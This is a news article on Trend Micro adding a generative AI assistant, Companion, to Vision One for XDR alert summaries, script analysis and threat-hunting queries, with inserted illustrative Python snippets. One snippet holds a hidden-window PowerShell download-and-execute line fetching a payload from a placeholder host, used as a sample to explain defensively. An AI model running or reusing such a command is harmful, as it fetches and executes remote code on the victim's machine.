Michael Hill
UK Editor

Trend Micro adds generative AI to Vision One for enhanced XDR

News
Jun 19, 2023 | 5 mins
Data and Information Security | Generative AI | Security Software

New generative artificial intelligence tool Companion is designed to amplify security operations, improve accessibility and efficiency, and accelerate threat hunting for analysts.

Image: attack surface programming abstract. Credit: whiteMocca / Shutterstock

Trend Micro has announced the integration of generative AI into its flagship Vision One platform with the new AI tool, Companion. Companion uses advanced AI/machine learning analytics and correlated detection models to enhance extended detection and response (XDR) capabilities, according to the cybersecurity vendor. It is designed to amplify security operations, improve accessibility and efficiency, and accelerate threat hunting for analysts of varying skill levels, Trend Micro claimed in a press release. The release marks the initial phase of a multi-quarter rollout of AI and large language model (LLM) capabilities embedded within Vision One, it added.

Generative AI- and LLM-enhanced threat detection and response is a prevalent trend in the cybersecurity market right now, as vendors incorporate the technology to make their products smarter, quicker, and more concise.

Companion works with Vision One security platform

Companion works in harmony with the broader Vision One platform to enhance XDR alerts by facilitating quicker understanding and more effective threat filtering, as well as contextualized AI-driven recommendations for security events, wrote Shannon Murphy, risk and threat specialist at Trend Micro, in a blog detailing Companion’s capabilities.

Companion uses a plain-language interface to empower users of varying skill levels with generative AI’s analytical capabilities to explain and contextualize alerts, triage and recommend actions, decode complex scripts, and develop and test search queries, Murphy added. Users can also control when they utilize Companion’s assistance, ensuring more experienced team members can continue their existing workflow seamlessly with or without support, she said.

Companion summarizes attacks, analyzes scripts, builds threat-hunting queries

Companion can provide security analysts with plain-language summaries of complex multi-step, multi-layer attacks. Previously, the sheer volume of data involved in such events could overwhelm an analyst.

“Now, a security analyst can easily prompt Companion for a plain-language summary of the event and receive a comprehensive breakdown explaining the attack, correlating the tactics and techniques, and surfacing the scope and impact to inform the analyst to immediately orchestrate an effective response, and inform new automated playbooks in the future,” Murphy wrote. At the same time, Companion reduces manual paperwork and reporting by automating email notifications, help-desk ticketing, and incident reports, streamlining incident response workflows, Murphy said.
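
Murphy does not detail how those reporting integrations are wired. As a rough, hypothetical sketch of the idea, an AI-generated attack summary could be pushed into a ticketing system automatically; the endpoint URL, payload fields, and token below are invented placeholders, not Companion's actual API.

```python
# Illustrative only: not Trend Micro's Companion integration. A minimal sketch of turning
# an AI-generated attack summary into a help-desk ticket; all names are hypothetical.
import requests

def file_incident_ticket(summary: str, severity: str, workbench_id: str) -> int:
    """Create a ticket from an XDR alert summary and return the new ticket ID."""
    payload = {
        "title": f"XDR alert {workbench_id}: {severity} severity incident",
        "description": summary,  # plain-language summary produced by the AI assistant
        "labels": ["xdr", "auto-generated"],
    }
    resp = requests.post(
        "https://helpdesk.example.com/api/tickets",  # placeholder ticketing endpoint
        json=payload,
        headers={"Authorization": "Bearer <API_TOKEN>"},  # placeholder credential
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json()["id"]
```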

In the scenario of a PowerShell script, Companion can be prompted to analyze and break down the script into individual command lines, identify command-line components, interpret the purpose and intended action, and then generate a human-readable and user-friendly explanation, according to Murphy. “Working in tandem with XDR, the analyst becomes aware of the potential threat implications and the necessary context to prioritize and respond.”
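
Trend Micro has not published Companion's underlying interface, but the pattern Murphy describes resembles a standard LLM prompt. As a hedged sketch using a generic OpenAI-style chat client (not anything Trend Micro ships), asking a model to decompose a suspicious PowerShell one-liner might look like this; the command and model name are placeholders.

```python
# Illustrative only: NOT Trend Micro's Companion API. A generic LLM client is asked to
# break a suspicious PowerShell one-liner into components and explain it in plain language.
from openai import OpenAI  # any chat-completion-capable client would work similarly

client = OpenAI()  # assumes an API key is configured in the environment

suspicious_command = (
    'powershell -nop -w hidden -c '
    '"IEX (New-Object Net.WebClient).DownloadString(\'http://example.com/payload.ps1\')"'
)

prompt = (
    "Break the following PowerShell command into its individual components (flags, "
    "cmdlets, arguments), explain what each part does, and describe the likely intent "
    "in plain language:\n\n" + suspicious_command
)

response = client.chat.completions.create(
    model="gpt-4o-mini",  # placeholder model; Companion's underlying model is not public
    messages=[{"role": "user", "content": prompt}],
)
print(response.choices[0].message.content)
```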

As for hunting queries and search languages, which can be challenging for analysts to master due to their complexity, Companion’s plain-language interface can build sophisticated queries to hunt for threats with greater accuracy and fewer errors, Murphy said. “By transforming plain-language search queries into formal syntax, analysts at any skill level can now rapidly execute queries to return more accurate results.”
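
Vision One's actual search syntax and Companion's prompting are not spelled out in the blog, but the general idea of pairing a plain-language request with a known field schema so a model can emit formal query syntax can be sketched roughly as follows; the field names here are hypothetical, not Vision One's real schema.

```python
# Illustrative only: not Vision One's query language or Companion's interface. A sketch of
# combining an analyst's plain-language hunt request with a searchable-field schema so an
# LLM can translate it into formal query syntax. Field names are hypothetical.
HYPOTHETICAL_SCHEMA = {
    "endpointHostName": "Name of the endpoint that produced the event",
    "processCmd": "Full command line of the launched process",
    "eventTime": "UTC timestamp of the event",
}

def build_query_prompt(plain_language_request: str) -> str:
    """Combine the analyst's plain-language request with the searchable fields."""
    fields = "\n".join(f"- {name}: {desc}" for name, desc in HYPOTHETICAL_SCHEMA.items())
    return (
        "Translate the request below into a formal search query using only these fields.\n"
        f"Available fields:\n{fields}\n\n"
        f"Request: {plain_language_request}\n"
        "Return only the query string."
    )

print(build_query_prompt(
    "Show endpoints that ran an encoded PowerShell command in the last 24 hours"
))
```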

AI/LLM capabilities prioritize security, prevent mixing of instances and training data

Trend Micro’s new generative AI and LLM capabilities have been built to prioritize security and compliance in line with the requirements of this emerging technology, including stringent measures to ensure visibility of how each model handles corporate data, according to the company.

Furthermore, additional controls and isolation mechanisms are implemented to prevent the mixing of Trend’s LLM with instances and training data from other vendors, it said. This will be of particular interest to security leaders, given widespread concerns about the potential risks involved with sharing sensitive and confidential business information with self-learning AI platforms.

Overreliance on AI-generated content a potential pitfall

The release brings Trend Micro firmly into next-generation protection capabilities for organizations and will help close the gap between identifying an exposure and remediating it, Philip Harris, research director at IDC, tells CSO. “This new platform raises the bar in reducing complexity and bringing simplicity not only technology-wise but for the all-important analyst on the back end that has to deal with the million and one things in near-to-real-time.”

However, there is a potential pitfall where analysts may become too reliant upon generative AI to provide answers, Harris says. “If analysts become too reliant upon the AI for answers, who is to say the answers are correct all the time? Analysts still need to possess the critical thinking skills to know whether an AI-generated answer is the right answer or is ‘off’ in some way.” The ability to spot whether something is amiss or doesn’t “smell right” is still a valued skillset for analysts to continue developing and deepening, he adds. “There could be a day in the not-too-distant future where we may be able to rely more heavily on AI to provide a high level of accuracy or point us in the right direction and Trend has provided a platform where analysts today can leverage their skillsets more than ever before to tune and calibrate this new and valuable AI resource while, at the same time, accelerate their ability to address issues.”